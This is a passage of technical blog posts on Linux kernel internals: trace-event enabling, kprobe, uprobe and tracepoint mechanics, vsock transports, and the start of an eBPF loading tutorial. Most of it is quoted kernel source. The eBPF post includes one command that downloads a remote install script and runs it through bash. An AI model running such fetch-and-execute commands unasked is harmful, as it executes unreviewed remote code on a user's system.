                    list_add(&file->list, &tr->events);

                    return file;
            }

Later in the fs_initcall(event_trace_init). It will create the directory and file about the event. event_trace_init() ->early_event_add_tracer() ->__trace_early_add_event_dirs() ->event_create_dir()

In the final ‘event_create_dir’ function, we create the direcotry and file. It may create a subsystem directory.

enable trace event

When we write the ‘enable’ file, the ‘event_enable_write’ will handle this.

            if (call->class->reg && !(call->flags & TRACE_EVENT_FL_IGNORE_ENABLE))
                    trace_create_file("enable", 0644, file->dir, file,
                                    &ftrace_enable_fops);

            static const struct file_operations ftrace_enable_fops = {
                    .open = tracing_open_generic,
                    .read = event_enable_read,
                    .write = event_enable_write,
                    .llseek = default_llseek,
            };

            static ssize_t
            event_enable_write(struct file *filp, const char __user *ubuf, size_t cnt,
                            loff_t *ppos)
            {
                    struct trace_event_file *file;
                    unsigned long val;
                    int ret;

                    ret = kstrtoul_from_user(ubuf, cnt, 10, &val);
                    if (ret)
                            return ret;

                    ret = tracing_update_buffers();
                    if (ret < 0)
                            return ret;

                    switch (val) {
                    case 0:
                    case 1:
                            ret = -ENODEV;
                            mutex_lock(&event_mutex);
                            file = event_file_data(filp);
                            if (likely(file))
                                    ret = ftrace_event_enable_disable(file, val);
                            mutex_unlock(&event_mutex);
                            break;

                    default:
                            return -EINVAL;
                    }

                    *ppos += cnt;

                    return ret ? ret : cnt;
            }

After the callchain ftrace_event_enable_disable->_ftrace_event_enable_disable->call->class->reg, the ‘trace_event_class’s reg callback will be called. This is ‘trace_event_reg’. ‘class->class-probe’ is ‘trace_event_raw_event##call’. After a long callchain, ‘trace_event_raw_event_##call’ is added to the ‘tracepoint’s funcs member.

            int trace_event_reg(struct trace_event_call *call,
                            enum trace_reg type, void *data)
            {
                    struct trace_event_file *file = data;

                    WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
                    switch (type) {
                    case TRACE_REG_REGISTER:
                            return tracepoint_probe_register(call->tp,
                                                            call->class->probe,
                                                            file);
                    case TRACE_REG_UNREGISTER:
                            tracepoint_probe_unregister(call->tp,
                                                    call->class->probe,
                                                    file);
                            return 0;

           ...
                    return 0;
            }

‘tracepoint_probe_register’ will be called.

            int tracepoint_probe_register(struct tracepoint *tp, void *probe, void *data)
            {
                    return tracepoint_probe_register_prio(tp, probe, data, TRACEPOINT_DEFAULT_PRIO);
            }

            int tracepoint_probe_register_prio(struct tracepoint *tp, void *probe,
                                            void *data, int prio)
            {
                    struct tracepoint_func tp_func;
                    int ret;

                    mutex_lock(&tracepoints_mutex);
                    tp_func.func = probe;
                    tp_func.data = data;
                    tp_func.prio = prio;
                    ret = tracepoint_add_func(tp, &tp_func, prio);
                    mutex_unlock(&tracepoints_mutex);
                    return ret;
            }

            static int tracepoint_add_func(struct tracepoint *tp,
                                    struct tracepoint_func *func, int prio)
            {
                    struct tracepoint_func *old, *tp_funcs;
                    int ret;

                    if (tp->regfunc && !static_key_enabled(&tp->key)) {
                            ret = tp->regfunc();
                            if (ret < 0)
                                    return ret;
                    }

                    tp_funcs = rcu_dereference_protected(tp->funcs,
                                    lockdep_is_held(&tracepoints_mutex));
                    old = func_add(&tp_funcs, func, prio);
                    if (IS_ERR(old)) {
                            WARN_ON_ONCE(1);
                            return PTR_ERR(old);
                    }

                    /*
                    * rcu_assign_pointer has a smp_wmb() which makes sure that the new
                    * probe callbacks array is consistent before setting a pointer to it.
                    * This array is referenced by __DO_TRACE from
                    * include/linux/tracepoints.h. A matching smp_read_barrier_depends()
                    * is used.
                    */
                    rcu_assign_pointer(tp->funcs, tp_funcs);
                    if (!static_key_enabled(&tp->key))
                            static_key_slow_inc(&tp->key);
                    release_probes(old);
                    return 0;
            }

Linux tracing - kprobe, uprobe and tracepoint

2020-08-05T00:00:00+00:00

Background

Linux tracing system is confused as there are many faces of tracing. There are lots of terminology around tracing such as ftrace, kprobe, uprobe, tracing event.

Julia Evans has written a blog Linux tracing systems & how they fit together to clarify these by splitting linux tracing systems into data sources (where the tracing data comes from), mechanisms for collecting data for those sources (like “ftrace”) and tracing frontends (the tool you actually interact with to collect/analyse data).

In this post, I will summary the mechanism of data sources. From Steven Rostedt slides Unified Tracing Platform the event trace basics kprobes, uprobes, tracepoint.

In this post I will give one example of each data sources and summary the mechanism how these work in Linux kernel.

kprobe

kprobe usage

Following is a raw usage of kprobe, minor adjustment from kernel/sample/kprobes/kprobe_example.c

            #include <linux/kernel.h>
            #include <linux/module.h>
            #include <linux/kprobes.h>

            #define MAX_SYMBOL_LEN	64
            static char symbol[MAX_SYMBOL_LEN] = "_do_fork";
            module_param_string(symbol, symbol, sizeof(symbol), 0644);

            /* For each probe you need to allocate a kprobe structure */
            static struct kprobe kp = {
                    .symbol_name	= symbol,
            };

            /* kprobe pre_handler: called just before the probed instruction is executed */
            static int handler_pre(struct kprobe *p, struct pt_regs *regs)
            {
                    pr_info("<%s> pre_handler: name = %s, p->addr = 0x%p, ip = %lx, flags = 0x%lx\n",
                            p->symbol_name, current->comm,  p->addr, regs->ip, regs->flags);

                    return 0;
            }

            /* kprobe post_handler: called after the probed instruction is executed */
            static void handler_post(struct kprobe *p, struct pt_regs *regs,
                                            unsigned long flags)
            {
                    pr_info("<%s> post_handler: p->addr = 0x%p, flags = 0x%lx\n",
                            p->symbol_name, p->addr, regs->flags);
            }

            /*
            * fault_handler: this is called if an exception is generated for any
            * instruction within the pre- or post-handler, or when Kprobes
            * single-steps the probed instruction.
            */
            static int handler_fault(struct kprobe *p, struct pt_regs *regs, int trapnr)
            {
                    pr_info("fault_handler: p->addr = 0x%p, trap #%dn", p->addr, trapnr);
                    /* Return 0 because we don't handle the fault. */
                    return 0;
            }

            static int __init kprobe_init(void)
            {
                    int ret;
                    kp.pre_handler = handler_pre;
                    kp.post_handler = handler_post;
                    kp.fault_handler = handler_fault;

                    ret = register_kprobe(&kp);
                    if (ret < 0) {
                            pr_err("register_kprobe failed, returned %d\n", ret);
                            return ret;
                    }
                    pr_info("Planted kprobe at %p\n", kp.addr);
                    return 0;
            }

            static void __exit kprobe_exit(void)
            {
                    unregister_kprobe(&kp);
                    pr_info("kprobe at %p unregistered\n", kp.addr);
            }

            module_init(kprobe_init)
            module_exit(kprobe_exit)
            MODULE_LICENSE("GPL");

After building and insmod it, the dmesg will show the message.

kprobe anatomy

The work flow of kprobe is as following:

register_kprobe() function register a probe address(mostly a function), prepare_kprobe()->arch_prepare_kprobe(), in x86 the later will copy the instruction of probe address and store it, arm_kprobe->arch_arm_kprobe(), in x86 the later function will modify the probe address’s instruction to ‘BREAKPOINT_INSTRUCTION’(int3 breakpoint). This kprobe is inserted in ‘kprobe_table’ hash list.
When the probe address is executed, do_int3() will be called to handle the exception. This function will call kprobe_int3_handler(), kprobe_int3_handler() call get_probe() to find the kprobe from the ‘kprobe_table’ hash list. And then call pre_handler of the registered kprobe. The kprobe_int3_handler then call ‘setup_singlestep’ to setup single execute the stored probe address. Then return and after the int3 handler over, the original probe address instruction execution begion.
After the original probe instruction complete, it triggers a single step exeception, this is handled by ‘kprobe_debug_handler’. In this function, the post_handler of registered kprobe will be executed.

The kretprobe is almostly the same as kprobe, in register_kretprobe(), it calls register_kprobe() to register a kprobe with the pre_handle ‘pre_handler_kretprobe’, This function will modify the normal return address to ‘kretprobe_trampoline’ address.

uprobe

uprobe usage

Prepare a tiny C program:

            #include <stdio.h>
            #include <stdlib.h>

            void f()
            {
            printf("f() called\n");
            }
            int main()
            {
            f();
            return 0; 
            }

Using objedump -S find the f()’s offset in ELF, it’s 0x64d here. Do the uprobe as following:

    root@ubuntu:~/uprobe# echo 'p /home/test/uprobe/test:0x64d' >> /sys/kernel/debug/tracing/uprobe_events 
    root@ubuntu:~/uprobe# echo 1 > /sys/kernel/debug/tracing/events/uprobes/p_test_0x64d/enable 
    root@ubuntu:~/uprobe# echo 1 > /sys/kernel/debug/tracing/tracing_on 
    root@ubuntu:~/uprobe# ./test
    f() called
    root@ubuntu:~/uprobe# ./test
    f() called
    root@ubuntu:~/uprobe# echo 0 > /sys/kernel/debug/tracing/tracing_on 
    root@ubuntu:~/uprobe# cat /sys/kernel/debug/tracing/trace
    # tracer: nop
    #
    # entries-in-buffer/entries-written: 2/2   #P:8
    #
    #                              _-----=> irqs-off
    #                             / _----=> need-resched
    #                            | / _---=> hardirq/softirq
    #                            || / _--=> preempt-depth
    #                            ||| /     delay
    #           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION
    #              | |       |   ||||       |         |
            test-17489 [005] d... 128037.287391: p_test_0x64d: (0x55f38badc64d)
            test-17490 [004] d... 128038.998229: p_test_0x64d: (0x55c76884e64d)

uprobe anatomy

The uprobe has no separately interface exported except the debugfs/tracefs. Following steps show how uprobe works.

Write uprobe event to ‘uprobe_events’. probes_write()->create_trace_uprobe(). The later function call kern_path() to open the ELF file and get the file’s inode. Call alloc_trace_uprobe() to allocate a trace_uprobe struct, the inode and offset is stored in this struct. Call register_trace_uprobe() to register a trace_uprobe. register_trace_uprobe() calls ‘regiseter_uprobe_event’ and insert trace_uprobe to probe_list. regiseter_uprobe_event() initialize the ‘trace_uprobe’ struct’s member ‘trace_event_call’ and call trace_add_event_call(). trace_add_event_call() calls __register_event() and __add_event_to_tracers(), the later will create a directory and some files(enalbe, id..) in ‘/sys/kernel/debug/tracing/events/uprobes’. Anyway when writing to ‘uprobe_events’ we just setup the structure in trace framwork.
When writing ‘/sys/kernel/debug/tracing/events/uprobes/p_test_0x64d/enable’, trace_uprobe_register()->probe_event_enable()->uprobe_register(). uprobe_register calls alloc_uprobe() to allocate a ‘struct uprobe’ and in this struct we store the inode and offset and calls insert_uprobe() to insert this ‘uprobe’ to ‘uprobes_tree’ rb-tree. Then register_for_each_vma() will be called to insert breakpoint(0xcc) in the current running process virtual memory.
When the ELF which has uprobe got executed, the ELF’s text file will be mmapped into the process address spaces and uprobe_mmap() will be called. In this function, build_probe_list() will be called to find all of the uprobe point and modify the process’ virtual memory address’s instruction to 0xcc.
When the program execution arrive the 0xcc, it trigger an int3 exception. In do_int3() it calls notify_die(DIE_INT3). This will call the callbacks registered in ‘die_chain’. In uprobe initialization function init_uprobes(), it registers ‘uprobe_exception_nb’, so arch_uprobe_exception_notify() will be called. uprobe_pre_sstep_notifier() will be called and set the thread flags with TIF_UPROBE. Before return to userspace exit_to_usermode_loop()->uprobe_notify_resume()->handle_swbp(), handle_swbp() will call the handler(handler_chain) and put thread to singlestep(pre_ssout).
After execute the original instruction, the program triggers a singlestep. In do_debug(), it calls notify_me(DIE_DEBUG) and handle_singlestep() will be called.

tracepoint

tracepoint anatomy

Low linux kernel version has a standalone example of pure tracepoint, for example v3.8 has a example in samples/tracepoints directory. Of course it can’t work in currently high version because currently the tracepoint has a more connection with the tracer(ftrace) and together called ‘trace event’ which I will talk about it in the next post.

The ‘DECLARE_TRACE’ and ‘DEFINE_TRACE’ is the key MACRO in tracepoint.

‘DECLARE_TRACE’ is defined as following:

            #define DECLARE_TRACE(name, proto, args)				\
                    __DECLARE_TRACE(name, PARAMS(proto), PARAMS(args),		\
                                    cpu_online(raw_smp_processor_id()),		\
                                    PARAMS(void *__data, proto),			\
                                    PARAMS(__data, args))


            #define __DECLARE_TRACE(name, proto, args, cond, data_proto, data_args) \
                    extern struct tracepoint __tracepoint_##name;			\
                    static inline void trace_##name(proto)				\
                    {								\
                            if (static_key_false(&__tracepoint_##name.key))		\
                                    __DO_TRACE(&__tracepoint_##name,		\
                                            TP_PROTO(data_proto),			\
                                            TP_ARGS(data_args),			\
                                            TP_CONDITION(cond), 0);			\
                            if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) {		\
                                    rcu_read_lock_sched_notrace();			\
                                    rcu_dereference_sched(__tracepoint_##name.funcs);\
                                    rcu_read_unlock_sched_notrace();		\
                            }							\
                    }								\
                    __DECLARE_TRACE_RCU(name, PARAMS(proto), PARAMS(args),		\
                            PARAMS(cond), PARAMS(data_proto), PARAMS(data_args))	\
                    static inline int						\
                    register_trace_##name(void (*probe)(data_proto), void *data)	\
                    {								\
                            return tracepoint_probe_register(&__tracepoint_##name,	\
                                                            (void *)probe, data);	\
                    }								\
                    static inline int						\
                    register_trace_prio_##name(void (*probe)(data_proto), void *data,\
                                            int prio)				\
                    {								\
                            return tracepoint_probe_register_prio(&__tracepoint_##name, \
                                                    (void *)probe, data, prio); \
                    }								\
                    static inline int						\
                    unregister_trace_##name(void (*probe)(data_proto), void *data)	\
                    {								\
                            return tracepoint_probe_unregister(&__tracepoint_##name,\
                                                            (void *)probe, data);	\
                    }								\
                    static inline void						\
                    check_trace_callback_type_##name(void (*cb)(data_proto))	\
                    {								\
                    }								\
                    static inline bool						\
                    trace_##name##_enabled(void)					\
                    {								\
                            return static_key_false(&__tracepoint_##name.key);	\
                    }

A tracepoint is represent by a ‘struct tracepoint’, the

            'extern struct tracepoint __tracepoint_##name'

means there will be a ‘tracepoint’ definition. In fact it is defined by ‘DEFINE_TRACE’ MACRO.

            struct tracepoint {
                    const char *name;		/* Tracepoint name */
                    struct static_key key;
                    int (*regfunc)(void);
                    void (*unregfunc)(void);
                    struct tracepoint_func __rcu *funcs;
            };

‘key’ is used to determine if the tracepoint is enabled. ‘funcs’ is the array of function in this tracepoint will call. ‘regfunc’ is the callback before we add function to tracepoint.

Here we see the definition of ‘trace_##name’ function, this is what we used in our code.

‘register_trace_##name’ function will call ‘tracepoint_probe_register’ to register our ‘tracepoint’ to system. ‘tracepoint_add_func’ will be used to do the real work.

            static int tracepoint_add_func(struct tracepoint *tp,
                                    struct tracepoint_func *func, int prio)
            {
                    struct tracepoint_func *old, *tp_funcs;
                    int ret;

                    if (tp->regfunc && !static_key_enabled(&tp->key)) {
                            ret = tp->regfunc();
                            if (ret < 0)
                                    return ret;
                    }

                    tp_funcs = rcu_dereference_protected(tp->funcs,
                                    lockdep_is_held(&tracepoints_mutex));
                    old = func_add(&tp_funcs, func, prio);
                    if (IS_ERR(old)) {
                            WARN_ON_ONCE(1);
                            return PTR_ERR(old);
                    }

                    /*
                    * rcu_assign_pointer has a smp_wmb() which makes sure that the new
                    * probe callbacks array is consistent before setting a pointer to it.
                    * This array is referenced by __DO_TRACE from
                    * include/linux/tracepoints.h. A matching smp_read_barrier_depends()
                    * is used.
                    */
                    rcu_assign_pointer(tp->funcs, tp_funcs);
                    if (!static_key_enabled(&tp->key))
                            static_key_slow_inc(&tp->key);
                    release_probes(old);
                    return 0;
            }

As we can see it just add ‘func’ to ‘tp->funcs’, it will be ordered by the ‘prio’(in func_add).

Now let’s look at the ‘DEFINE_TRACE’ MACRO.

            #define DEFINE_TRACE_FN(name, reg, unreg)				 \
                    static const char __tpstrtab_##name[]				 \
                    __attribute__((section("__tracepoints_strings"))) = #name;	 \
                    struct tracepoint __tracepoint_##name				 \
                    __attribute__((section("__tracepoints"))) =			 \
                            { __tpstrtab_##name, STATIC_KEY_INIT_FALSE, reg, unreg, NULL };\
                    static struct tracepoint * const __tracepoint_ptr_##name __used	 \
                    __attribute__((section("__tracepoints_ptrs"))) =		 \
                            &__tracepoint_##name;

            #define DEFINE_TRACE(name)						\
                    DEFINE_TRACE_FN(name, NULL, NULL);

So here we can see the ‘struct tracepoint’ has been defined and is stored in ‘__tracepoints’ section.

Now that we know the create of ‘strcut tracepoint’ let’s see what happend when we call ‘trace_##name’. It will call __DO_TRACE.

                    static inline void trace_##name(proto)				\
                    {								\
                            if (static_key_false(&__tracepoint_##name.key))		\
                                    __DO_TRACE(&__tracepoint_##name,		\
                                            TP_PROTO(data_proto),			\
                                            TP_ARGS(data_args),			\
                                            TP_CONDITION(cond), 0);			\
                            if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) {		\
                                    rcu_read_lock_sched_notrace();			\
                                    rcu_dereference_sched(__tracepoint_##name.funcs);\
                                    rcu_read_unlock_sched_notrace();		\
                            }							\
                    }


            #define __DO_TRACE(tp, proto, args, cond, rcucheck)			\
                    do {								\
                            struct tracepoint_func *it_func_ptr;			\
                            void *it_func;						\
                            void *__data;						\
                                                                                    \
                            if (!(cond))						\
                                    return;						\
                            if (rcucheck) {						\
                                    if (WARN_ON_ONCE(rcu_irq_enter_disabled()))	\
                                            return;					\
                                    rcu_irq_enter_irqson();				\
                            }							\
                            rcu_read_lock_sched_notrace();				\
                            it_func_ptr = rcu_dereference_sched((tp)->funcs);	\
                            if (it_func_ptr) {					\
                                    do {						\
                                            it_func = (it_func_ptr)->func;		\
                                            __data = (it_func_ptr)->data;		\
                                            ((void(*)(proto))(it_func))(args);	\
                                    } while ((++it_func_ptr)->func);		\
                            }							\
                            rcu_read_unlock_sched_notrace();			\
                            if (rcucheck)						\
                                    rcu_irq_exit_irqson();				\
                    } while (0)

It will call the functions in ‘tp->funcs’ array.

So here we have a tracepoint framework, the only is to add ‘function’ to ‘tp->funcs’, this is call ‘probe’ function. In the old days, we can use another kernel module to do this. However nowdays the tracepoint is tied with ftrace and called ‘trace event’.

Next post will talk about how ‘trace event’ work.

Linux vsock internals

2020-04-18T00:00:00+00:00

Background

VM Sockets(vsock) is a fast and efficient communication mechanism between guest virtual machines and their host. It was added by VMware in commit VSOCK: Introduce VM Sockets. The commit added a new socket address family named vsock and its vmci transport.

VM Sockets can be used in a lot of situation such as the VMware Tools inside the guest. As vsock is very useful the community has development vsock supporting other hypervisor such as qemu&&kvm and HyperV. Redhat added the virtio transport for vsock in VSOCK: Introduce virtio_transport.ko, for vhost transport in host was added in comit VSOCK: Introduce vhost_vsock.ko. Microsoft added the HyperV transport in commit hv_sock: implements Hyper-V transport for Virtual Sockets (AF_VSOCK), Of course this host transport is in Windows kernel and no open sourced.

This post will focus the virtio transport in guest and vhost transport in host.

Architecture

Following pics is from Stefano Garzarella’s slides

There are several layers here.

application, use <cid,port> as a socket address
socket layer, support for socket API
AF_VSOCK address family, implement the vsock core
transport, trasnport the data between guest and host.

The transport layer is the mostly needed to talk as the other three just need to implement standand interfaces in kernel.

Transport as its name indicated, is used to transport the data between guest and host just like the networking card tranpost data between local and remote socket. There are two kinds of transports according to data’s flow direction.

G2H: guest->host transport, they run in the guest and the guest vsock networking protocol uses this to communication with the host.
H2G: host->guest transport, they run in the host and the host vsock networing protocol uses this to communiction with the guest.

Usually H2G transport is implemented as a device emulation, and G2H transport is implemented as the emulated device’s driver. For example, in VMware the H2G transport is a emulated vmci PCI device and the G2H is vmci device driver. In qemu the H2G transport is a emulated vhost-vsock device and the G2H transport is the vosck device’s driver.

Following pic shows the virtio(in guest) and vhost(in host) transport. This pic also from Stefano Garzarella’s slides.

vsock socket address family and G2H transport is implemented in ‘net/vmw_vsock’ directory in linux tree. H2G transport is implemented in ‘drivers’ directory, vhost vsock is in ‘drivers/vhost/vsock.c’ and vmci is in ‘drivers/misc/vmw_vmci’ directory.

Following pic shows the more detailed virtio<->vhost transport in qemu.

Following is the steps how guest and host initialize their tranport channel.

When start qemu, we need add ‘-device vhost-vsock-pci,guest-cid=' in qemu cmdline.
load the vhost_vsock driver in host.
The guest kernel will probe the vhost-vsock pci device and load its driver. This virtio driver is registered in ‘virtio_vsock_init’ function.
The virtio_vsock driver initializes the emulated vhost-vsock device. This will communication with vhost_vsock driver.

Transport layer has a global variable named ‘transport’. Both guest and host side need to register his vsock transport by calling ‘vsock_core_init’. This function will set the ‘transport’ to an transport implementaion.

For example the guest kernel function ‘virtio_vsock_init’ calls ‘vsock_core_init’ to set the ‘transport’ to ‘virtio_transport.transport’ and the host kernel function ‘vhost_vsock_init’ calls ‘vsock_core_init’ to set the ‘transport’ to ‘vhost_transport.transport’.

After initialization, the guest and host can use vsock to talk to each other.

send/recv data

vsock has two type just like udp and tcp for ipv4. Following shows the ‘vsock_stream_ops’

    static const struct proto_ops vsock_stream_ops = {
            .family = PF_VSOCK,
            .owner = THIS_MODULE,
            .release = vsock_release,
            .bind = vsock_bind,
            .connect = vsock_stream_connect,
            .socketpair = sock_no_socketpair,
            .accept = vsock_accept,
            .getname = vsock_getname,
            .poll = vsock_poll,
            .ioctl = sock_no_ioctl,
            .listen = vsock_listen,
            .shutdown = vsock_shutdown,
            .setsockopt = vsock_stream_setsockopt,
            .getsockopt = vsock_stream_getsockopt,
            .sendmsg = vsock_stream_sendmsg,
            .recvmsg = vsock_stream_recvmsg,
            .mmap = sock_no_mmap,
            .sendpage = sock_no_sendpage,
    };

Most of the ‘proto_ops’ of vsock is easy to understand. Here I just use send/recv process to show how the transport layer ‘transport’ data between ‘guest’ and ‘host’.

guest send

‘vsock_stream_sendmsg’ is used to send data to host, it calls transport’s ‘stream_enqueue’ callback, in guest this function is ‘virtio_transport_stream_enqueue’. It creates a ‘virtio_vsock_pkt_info’ and called ‘virtio_transport_send_pkt_info’.

    ssize_t
    virtio_transport_stream_enqueue(struct vsock_sock *vsk,
                                    struct msghdr *msg,
                                    size_t len)
    {
            struct virtio_vsock_pkt_info info = {
                    .op = VIRTIO_VSOCK_OP_RW,
                    .type = VIRTIO_VSOCK_TYPE_STREAM,
                    .msg = msg,
                    .pkt_len = len,
                    .vsk = vsk,
            };

            return virtio_transport_send_pkt_info(vsk, &info);
    }


    virtio_transport_send_pkt_info
            -->virtio_transport_alloc_pkt
            -->virtio_transport_get_ops()->send_pkt(pkt);(virtio_transport_send_pkt)

‘virtio_transport_alloc_pkt’ allocate a buffer(‘pkt->buf’) to store the send data’. ‘virtio_transport_send_pkt’ insert the ‘virtio_vsock_pkt’ to a list and queue it to a queue_work. The actully data send is in ‘virtio_transport_send_pkt_work’ function.

In ‘virtio_transport_send_pkt_work’ it is the virtio driver’s standard operation, prepare scatterlist using msg header and msg itself, call ‘virtqueue_add_sgs’ and call ‘virtqueue_kick’.

    static void
    virtio_transport_send_pkt_work(struct work_struct *work)
    {
            struct virtio_vsock *vsock =
                    container_of(work, struct virtio_vsock, send_pkt_work);
            struct virtqueue *vq;
            bool added = false;
            bool restart_rx = false;

            mutex_lock(&vsock->tx_lock);
            ...
            vq = vsock->vqs[VSOCK_VQ_TX];

            for (;;) {
                    struct virtio_vsock_pkt *pkt;
                    struct scatterlist hdr, buf, *sgs[2];
                    int ret, in_sg = 0, out_sg = 0;
                    bool reply;

                    ...
                    pkt = list_first_entry(&vsock->send_pkt_list,
                                    struct virtio_vsock_pkt, list);
                    list_del_init(&pkt->list);
                    spin_unlock_bh(&vsock->send_pkt_list_lock);

                    virtio_transport_deliver_tap_pkt(pkt);

                    reply = pkt->reply;

                    sg_init_one(&hdr, &pkt->hdr, sizeof(pkt->hdr));
                    sgs[out_sg++] = &hdr;
                    if (pkt->buf) {
                            sg_init_one(&buf, pkt->buf, pkt->len);
                            sgs[out_sg++] = &buf;
                    }

                    ret = virtqueue_add_sgs(vq, sgs, out_sg, in_sg, pkt, GFP_KERNEL);
                    /* Usually this means that there is no more space available in
                    * the vq
                    */
                    ...

                    added = true;
            }

            if (added)
                    virtqueue_kick(vq);

    ...
    }

host recv

The host side’s handle for the tx queue kick is ‘vhost_vsock_handle_tx_kick’, this is initialized in ‘vhost_vsock_dev_open’ function.

‘vhost_vsock_handle_tx_kick’ also perform the virtio backedn standard operation, pop the vring desc and calls ‘vhost_vsock_alloc_pkt’ to reconstruct a ‘virtio_vsock_pkt’, then calls ‘virtio_transport_recv_pkt’ to delivery the packet to destination.

    static void vhost_vsock_handle_tx_kick(struct vhost_work *work)
    {
            struct vhost_virtqueue *vq = container_of(work, struct vhost_virtqueue,
                                                    poll.work);
            struct vhost_vsock *vsock = container_of(vq->dev, struct vhost_vsock,
                                                    dev);
            struct virtio_vsock_pkt *pkt;
            int head, pkts = 0, total_len = 0;
            unsigned int out, in;
            bool added = false;

            mutex_lock(&vq->mutex);
            ...
            vhost_disable_notify(&vsock->dev, vq);
            do {
                    u32 len;
                    ...
                    head = vhost_get_vq_desc(vq, vq->iov, ARRAY_SIZE(vq->iov),
                                            &out, &in, NULL, NULL);
                    ...
                    pkt = vhost_vsock_alloc_pkt(vq, out, in);
                    ...

                    len = pkt->len;

                    /* Deliver to monitoring devices all received packets */
                    virtio_transport_deliver_tap_pkt(pkt);

                    /* Only accept correctly addressed packets */
                    if (le64_to_cpu(pkt->hdr.src_cid) == vsock->guest_cid)
                            virtio_transport_recv_pkt(pkt);
                    else
                            virtio_transport_free_pkt(pkt);

                    len += sizeof(pkt->hdr);
                    vhost_add_used(vq, head, len);
                    total_len += len;
                    added = true;
            } while(likely(!vhost_exceeds_weight(vq, ++pkts, total_len)));
            ...
    }

‘virtio_transport_recv_pkt’ is the actually function to delivery the msg data. It calls ‘vsock_find_connected_socket’ to find the destination remote socket then according to the dest socket state calls specific function. For ‘TCP_ESTABLISHED’ it calls ‘virtio_transport_recv_connected’.

    void virtio_transport_recv_pkt(struct virtio_vsock_pkt *pkt)
    {
            struct sockaddr_vm src, dst;
            struct vsock_sock *vsk;
            struct sock *sk;
            bool space_available;

            vsock_addr_init(&src, le64_to_cpu(pkt->hdr.src_cid),
                            le32_to_cpu(pkt->hdr.src_port));
            vsock_addr_init(&dst, le64_to_cpu(pkt->hdr.dst_cid),
                            le32_to_cpu(pkt->hdr.dst_port));
            ...

            /* The socket must be in connected or bound table
            * otherwise send reset back
            */
            sk = vsock_find_connected_socket(&src, &dst);
            ...
            vsk = vsock_sk(sk);

            ...
            switch (sk->sk_state) {
            case TCP_LISTEN:
                    virtio_transport_recv_listen(sk, pkt);
                    virtio_transport_free_pkt(pkt);
                    break;
            case TCP_SYN_SENT:
                    virtio_transport_recv_connecting(sk, pkt);
                    virtio_transport_free_pkt(pkt);
                    break;
            case TCP_ESTABLISHED:
                    virtio_transport_recv_connected(sk, pkt);
                    break;
            case TCP_CLOSING:
                    virtio_transport_recv_disconnecting(sk, pkt);
                    virtio_transport_free_pkt(pkt);
                    break;
            default:
                    virtio_transport_free_pkt(pkt);
                    break;
            }
            release_sock(sk);

            /* Release refcnt obtained when we fetched this socket out of the
            * bound or connected list.
            */
            sock_put(sk);
            return;

    free_pkt:
            virtio_transport_free_pkt(pkt);
    }

For the send data the ‘pkt->hdr.op’ is ‘VIRTIO_VSOCK_OP_RW’ so ‘virtio_transport_recv_enqueue’ will be called. ‘virtio_transport_recv_enqueue’ adds the packet to the destination’s socket’s queue ‘rx_queue’.

So when the host/othere VM calls recv, the ‘vsock_stream_recvmsg’ will be called and the transport layer’s ‘stream_dequeue’ callback(virtio_transport_stream_do_dequeue) will be called. virtio_transport_stream_do_dequeue will pop the entry from ‘rx_queue’ and store it to msghdr and return to the userspace application.

    static ssize_t
    virtio_transport_stream_do_dequeue(struct vsock_sock *vsk,
                                    struct msghdr *msg,
                                    size_t len)
    {
            struct virtio_vsock_sock *vvs = vsk->trans;
            struct virtio_vsock_pkt *pkt;
            size_t bytes, total = 0;
            u32 free_space;
            int err = -EFAULT;

            spin_lock_bh(&vvs->rx_lock);
            while (total < len && !list_empty(&vvs->rx_queue)) {
                    pkt = list_first_entry(&vvs->rx_queue,
                                    struct virtio_vsock_pkt, list);

                    bytes = len - total;
                    if (bytes > pkt->len - pkt->off)
                            bytes = pkt->len - pkt->off;

                    /* sk_lock is held by caller so no one else can dequeue.
                    * Unlock rx_lock since memcpy_to_msg() may sleep.
                    */
                    spin_unlock_bh(&vvs->rx_lock);

                    err = memcpy_to_msg(msg, pkt->buf + pkt->off, bytes);
                    if (err)
                            goto out;

                    spin_lock_bh(&vvs->rx_lock);

                    total += bytes;
                    pkt->off += bytes;
                    if (pkt->off == pkt->len) {
                            virtio_transport_dec_rx_pkt(vvs, pkt);
                            list_del(&pkt->list);
                            virtio_transport_free_pkt(pkt);
                    }
            }

            ...
            return total;

    ...
    }

multi-transport

From above as we can see one kernel(both host/guest) can only register one transport. This is problematic in nested virtualization environment. For example the host with L0 VMware VM and in it there is a L1 qemu/kvm VM. The L0 VM can only register one transport, if it register the ‘vmci’ transport it can just talk to the VMware vmci device. If it register the ‘vhost_vsock’ it can just talk to the L1 VM. Fortunately Stefano Garzarella has addressed this issue in commit vsock: add multi-transports support . Who interested this can learn more.

Reference

virtio-vsock Zero-configuration host/guest communication, Stefan Hajnoczi, KVM froum 2015
VSOCK: VM↔host socket with minimal configuration, Stefano Garzarella, DevConf.CZ 2020
AF_VSOCK: nested VMs and loopback support available

Write eBPF program in pure C

2020-01-18T00:00:00+00:00

While developing new eBPF program type, we need do some small test. We do not want to touch a lot of the libbpf or the higher bcc. What we need is just a eBPF program and loding it to kernel. This post is about how to do this. In this article, I will adds a eBPF program to kprobe tracepoint. This includes three parts, prepare the eBPF program, a loader to load this eBPF program and open the kernel function to kprobe.

Prepare a eBPF program

In Debian 9.1 we install a custome kernel(4.9.208). Go to the samples/bpf, and make(first need to isntall clang and llvm).

Add a test_bpf.c in samples/bpf directory.

    #include <uapi/linux/bpf.h>
    #include "bpf_helpers.h"

    int bpf_prog(void *ctx) {
        char buf[] = "Hello World!\n";
        bpf_trace_printk(buf, sizeof(buf));
        return 0;
    }

Add one line in samples/bpf/Makefile right place.

    always += test_bpf.o

Then type ‘make’ to compile this bpf program.

Now we get a ‘test_bpf.o’ file. But it contains a lot of ELF file metadata. We need to extract the eBPF program itself out.

First let’s see what the eBPF code is. The first try shows that the Debian’s built-in llvm tools is too old, it doesn’t support ‘-S’ option.

    root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# llvm-objdump -arch-name=bpf -S test_bpf.o
    llvm-objdump: Unknown command line argument '-S'.  Try: 'llvm-objdump -help'
    llvm-objdump: Did you mean '-D'?

Got to ‘http://apt.llvm.org/’ and install the new clang and llvm.

    bash -c "$(wget -O - https://apt.llvm.org/llvm.sh)"

Use the new tool to see the eBPF program.

    root@192:/home/test/linux-4.9.208/linux-4.9.208/samples/bpf# llvm-objdump-9 -arch-name=bpf -S test_bpf.o

